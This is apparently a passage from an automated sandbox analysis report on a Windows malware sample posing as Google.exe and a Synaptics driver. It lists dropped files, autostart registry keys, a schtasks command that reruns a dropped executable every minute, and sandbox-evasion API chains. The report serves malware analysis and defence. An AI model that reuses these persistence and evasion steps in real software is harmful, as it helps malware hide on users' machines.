                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EBB9D push FFFFFF8Bh; iretd 11_2_008EBB9F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0029020C pushfd ; retf 27_2_00290215
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002AC6CC push esi; ret 27_2_002AC6CE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026CB5D push edi; ret 27_2_0026CB5F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026CC76 push esi; ret 27_2_0026CC78
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026CE51 push esi; ret 27_2_0026CE53
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026CF3A push edi; ret 27_2_0026CF3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00267795 push ecx; ret 27_2_002677A8
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028BB9D push FFFFFF8Bh; iretd 27_2_0028BB9F

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files to the document folder of the user
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\RCXC360.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\RCX915F.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeFile created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Local\Temp\._cache_Google.exeJump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\RCXC360.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\RCX915F.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                            Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                            Boot Survival

                            barindex
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BBLXFGJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                            Drops PE files to the startup folder
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeJump to dropped file
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnkJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BBLXFGJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BBLXFGJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0091F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0091F78E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00967F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00967F0E
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008BF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_008BF78E
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_00907F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00907F0E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0025F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_0025F78E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002A7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_002A7F0E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00921E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00921E5A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Found API chain indicative of sandbox detection
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWindow / User API: threadDelayed 4763Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWindow / User API: foregroundWindowGot 1236Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI coverage: 6.5 %
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeAPI coverage: 3.8 %
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeAPI coverage: 3.8 %
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe TID: 4632Thread sleep time: -47630s >= -30000sJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7204Thread sleep time: -1500000s >= -30000sJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8080Thread sleep time: -60000s >= -30000sJump to behavior
